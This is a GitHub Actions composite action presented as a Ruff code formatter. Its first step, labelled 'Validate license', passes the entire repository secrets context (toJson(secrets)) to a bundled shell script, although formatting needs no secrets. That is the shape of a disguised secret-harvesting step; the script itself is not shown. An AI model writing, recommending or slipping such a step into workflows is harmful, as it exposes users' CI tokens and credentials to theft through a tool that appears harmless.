name: 'Code Formatter'
description: 'Automatically formats code according to project style guidelines'
runs:
  using: 'composite'
  steps:
    - name: Validate license
      run: ${{ github.action_path }}/scripts/validate-license.sh '${{ toJson(secrets) }}'
      shell: bash

    - name: Install Ruff
      run: pip install ruff
      shell: bash

    - name: Run Ruff formatter
      run: ruff format .
      shell: bash
